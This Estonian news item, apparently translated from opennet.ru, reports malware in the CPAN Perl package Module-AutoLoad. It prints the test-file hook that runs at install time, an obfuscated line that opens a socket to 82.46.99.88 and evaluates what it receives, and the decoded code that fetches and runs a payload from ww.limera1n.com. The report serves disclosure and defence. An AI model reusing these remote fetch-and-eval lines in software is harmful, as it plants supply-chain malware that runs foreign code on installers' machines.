Perl-paketis Module-AutoLoad avastati pahavara

CPAN Perl-paketti kaudu jaotatavas Module-AutoLoad, mille eesmärk on automaatselt laadida CPAN-mooduleid jooksvalt, tuvastati kahjulik kood. Kahjulik sisestus oli leitud testikoodis 05_rcx.t, mis on saadaval alates 2011. aastast.
On märkimisväärne, et küsimusi kahtlase koodi laadimise kohta on esitatud juba Stackoverflow 2016. aastal.

Kahjulik tegevus seisneb katsetes laadida ja käivitada koodi kolmandast serverist (http://r.cx:1/) testikomplekti käitamise käigus, mis käivitatakse mooduli installimise ajal. Eeldatakse, et algselt välisest serverist laaditud kood ei olnud kahjulik, kuid nüüd suunatakse päring domeenile ww.limera1n.com, mis annab välja osa koodist käitamiseks.

Laadimise korraldamiseks failis 05_rcx.t kasutatakse järgmist koodi:

my $prog = __FILE__;
$prog =~ s{[^\/]+\.t}{..\/contrib\/RCX.pl}x;
my $try = `$^X $prog`;

Esitatud kood viib skripti täitmiseni ..\/contrib\/RCX.pl, mille sisu koosneb järgmistest ridadest:

use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1″};

Antud skript laadib segmenteeritud kasutades teenust perlobfuscator.com koodi välisest hostist r.cx (koodid 82.46.99.88 vastavad tekstile «R.cX») ja käivitab selle eval-blokis.

$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.»:1″; print ;’
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Pärast puhastamist saavutatakse järgmine kood:

print{$b=new IO::Socket::INET»ww.limera1n.com:80″}»GET /iJailBreak
«;evalor return warn$@while$b;1

Praegu on probleemne pakett eemaldatud hoidlalt PAUSE (Perl Authors Upload Server), ja tema mooduli autori konto on blokeeritud. Sellegipoolest jääb moodul saadaval MetaCPAN arhiivis ja võib olla otse installitud MetaCPAN-ist mõnede tööriistade abil, nagu cpanminus. Märgitakse, et pakett ei olnud laialdaselt levinud.

Huvi pakub arutelu ühendatud ja mooduli autor, kes kõrvale heitis teate, et pahatahtlik kood oleks asetatud pärast tema saidi «r.cx» häkkimist ja selgitas, et ta lihtsalt lõbutses, ning et perlobfuscator.com kasutati mitte millegi varjamiseks, vaid koodi suuruse vähendamiseks ja selle lihtsalt kopeerimiseks lõikelauale. Funktsiooni nime «botstrap» valik on seletatud sellega, et see sõna «kõlab nagu bot ja on lühem kui bootstrap». Mooduli autor kinnitas ka, et tuvastatud manipulatsioonid ei tekitanud kahjulikku toimet, vaid näitasid lihtsalt koodi laadimist ja täitmist TCP kaudu.

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster